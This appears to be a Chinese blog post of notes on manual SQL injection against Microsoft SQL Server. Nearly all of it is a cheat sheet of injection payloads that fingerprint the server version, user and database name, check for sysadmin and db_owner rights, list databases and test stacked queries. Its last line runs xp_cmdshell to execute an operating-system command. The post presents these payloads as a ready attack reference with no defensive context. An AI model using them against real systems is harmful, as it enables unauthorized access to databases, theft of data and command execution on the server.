zoukankan      html  css  js  c++  java
  • mssql手工注入心的

    select * from T_user where exists (select * from sysobjects) ;//判断是否存在sysobjects表,默认的
    select * from T_user where exists (select * from T_user);//判断是否存在XX表
    select * from T_user where 1=(@@version);//数据库版本号
    select * from T_user where 1=(user_name());//获取当前用户
    select * from T_user where 1=(@@servername);//获取当前服务器名称
    select * from T_user where 1=user;//获取当前用户名
    select * from T_user where 1=(@@spid);//当前mssql的进程id
    select * from T_user where 1=(db_name());//获取当前数据库名称
    select * from T_user where 1=(is_srvrolemember('sysadmin'));//是否是sysadmin
    select * from T_user where 1=(is_member('db_owner'));//是否是数据库拥有者
    select * from T_user where 1=(has_dbaccess('master'));//是否拥有数据库读写权限
    select * from T_user where 1=(select filename from master.dbo.sysdatabases where dbid=5 ); //查询服务器上的所有数据库,根据数据库的dbid
    select * from master.dbo.sysdatabases;//查询主库
    select * from T_user where 1=1;declare @d int ;//是否支持多行查询
    select * from T_user where 1=1;execute master.dbo.xp_cmdshell 'tree C:\';
  • 相关阅读:
    CSS样式
    hdu 6038 Function
    hdu 6034 Balala Power!
    错排公式 (递推)
    快速求排列组合 lucas定理
    fzu Problem 2275 Game(kmp)
    HDU 3635 Dragon Balls(并查集)
    HDU 3172 Virtual Friends(map+并查集)
    hdu 2818 Building Block(并查集,有点点复杂)
    hdu 1272 小希的迷宫(并查集)
  • 原文地址:https://www.cnblogs.com/beyond1983/p/3023703.html
Copyright © 2011-2022 走看看